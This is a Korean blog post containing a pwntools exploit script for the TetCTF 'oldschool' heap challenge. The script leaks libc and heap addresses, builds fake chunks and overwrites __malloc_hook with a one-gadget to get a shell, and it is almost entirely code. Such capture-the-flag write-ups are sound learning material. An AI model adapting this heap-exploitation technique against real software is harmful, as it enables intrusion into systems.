티스토리 뷰

카테고리 없음

[ tetctf ] oldshool

mhibio 2020. 1. 11. 14:56

tetctheap문제입니다

oldschool


from pwn import *

#context.log_level = 'debug'

#p = remote("54.157.217.45", 19669)
p = process('./oldschool')
e = ELF("./oldschool")
#l = e.libc

l = ELF("./libc-2.23.so")

#context.log_level = 'debug'

def add(size, data):
p.recvuntil(": ")
p.sendline('1')
sleep(0.3)
p.recvuntil(": ")
p.send(str(size))
sleep(0.3)
p.recvuntil(": ")
p.send(str(data))
sleep(0.3)

def edit(idx, data):
p.recvuntil(": ")
p.sendline('2')
sleep(0.3)
p.recvuntil(": ")
p.sendline(str(idx))
sleep(0.3)
p.recvuntil(": ")
p.send(str(data))
sleep(0.3)

def show(idx):
p.recvuntil(": ")
p.sendline('3')
sleep(0.3)
p.recvuntil(": ")
p.sendline(str(idx))
sleep(0.3)

def fr(idx):
p.recvuntil(": ")
p.sendline('4')
sleep(0.3)
p.recvuntil(": ")
p.sendline(str(idx))
sleep(0.3)

fake = p64(0) + p64(0x21)
fake += p64(0)*3 + p64(0x21)

add(0x60, fake) # 0
add(0x200, 'a') # 1
add(0x10, 'a') # 2
add(0x10, 'a') # 3

fr(1)

add(0x200, 'b') # 1
show(1)

libc = u64(p.recvuntil("\x7f")[-6:].ljust(8, '\x00')) - 0x10 - l.sym['__malloc_hook'] - 66
log.info(hex(libc))


fr(2)
fr(3)

add(0x10, 'a') # 2

sleep(0.3)
add(0x10, 'b') # 3

show(2)

p.recvuntil('Name: ')
heap = u64(p.recv(6).ljust(8, '\x00')) - 0x61 -0x200
log.info(hex(heap))

fake = p64(0) + p64(0x21)
fake += p64(heap) + p64(0)*2 + p64(0x21)
edit(0, fake)
#context.log_level = 'debug'

add(0, '6') # 4
add(0, "6") # 5

edit(4, '6')
fr(5)
add(0, '6') # 5

add(0, '6')
fr(4)
fr(6)
edit(5, '6')

#context.log_level = 'debug'
add(0x10, p64(heap))
add(0x10, 'a')
fake = p64(0) + p64(0x21)
fake += p64(0)*3 + p64(0x21)
add(0x60, fake)
add(0x10, p64(heap+0x30)+p32(0x60) +p32(10))

add(0x60, 'a')
fr(9)
edit(0, p64(heap+0x30))
fr(0)

fr(3)
edit(8, p64(heap+0x460))
fr(7)

fr(1)
fr(2)

add(0x60, p64(libc+l.sym['__malloc_hook']-0x23))
add(0x60, 'a')
add(0x60, 'b')
add(0x60, "A"*19+p64(libc+0xf02a4))

p.recvuntil(": ")
p.send('1')

p.recv()
p.recv()

p.interactive()

진짜 인텐 풀이가 뭔지 궁금합니다 ㅠㅠ

댓글
댓글쓰기 폼
공지사항
Total
7,553
Today
0
Yesterday
4
TAG
more
«   2022/01   »
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31          
글 보관함